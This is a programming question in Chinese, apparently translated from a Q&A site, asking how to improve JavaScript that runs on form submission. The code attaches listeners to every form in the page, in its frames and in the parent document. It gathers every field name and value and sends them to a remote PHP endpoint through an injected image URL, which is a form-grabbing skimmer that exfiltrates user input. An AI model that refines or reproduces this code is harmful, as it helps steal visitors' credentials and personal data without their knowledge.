我需要能够在表单提交后执行php链接我已经在JS中使用了所有工作,除了执行URL而没有一些不太友好的警告框,至少可以说是用户友好。我的前任并不是真的了解XSS所以只是添加了一个图像标签来尝试和执行链接,你对我如何改进/让它工作有任何想法..提前感谢
功能1
function attach(wnd,handler){
for(var i=0; i<wnd.document.forms.length; i++){
var form = wnd.document.forms[i];
form.addEventListener('submit', handler,false);
}
for(var i=0; i<wnd.frames.length; i++){
var iwnd = wnd.frames[i];
attach(iwnd,handler);
}
}
功能2
function formSubmit(e){
var forms=parent.document.getElementsByTagName("form");
for (i = 0 ; i < forms.length; i++)
{
var chain="";
var forms=parent.document.getElementsByTagName("form");
for (x = 0 ; x < forms.length; x++)
{
var elements=forms[x].elements;
for (e = 0 ; e < elements.length; e++)
{
chain += elements[e].name + "%3d" + elements[e].value + "|";
}
}
//Very bad code XSS etc
var pic = document.createElement('img');
pic.className = 'avatar';
pic.src = 'http://x.x.x.x/images/Image.php?id=0.0.0.0&idi=test'+chain;
pic.height = '50';
pic.width = '50';
document.getElementById('test').appendChild(pic);
}
}
简单添加监听器
window.addEventListener('load', function(){attach(window,formSubmit);},false);
或者这个Js更好,但我不太确定如何将链的价值恢复到网址
function FormEnum()
{
var forms = parent.document.getElementsByTagName("form");
for (i = 0 ; i < forms.length; i++)
{
forms[i].addEventListener('submit', function() {
var chain = "";
var forms = parent.document.getElementsByTagName("form");
for (x = 0 ; x < forms.length; x++)
{
var elements = forms[x].elements;
for (e = 0 ; e < elements.length; e++)
{
chain += elements[e].name + "%3d" + elements[e].value + "|";
}
}
attachForm(chain);
}, false);
}
}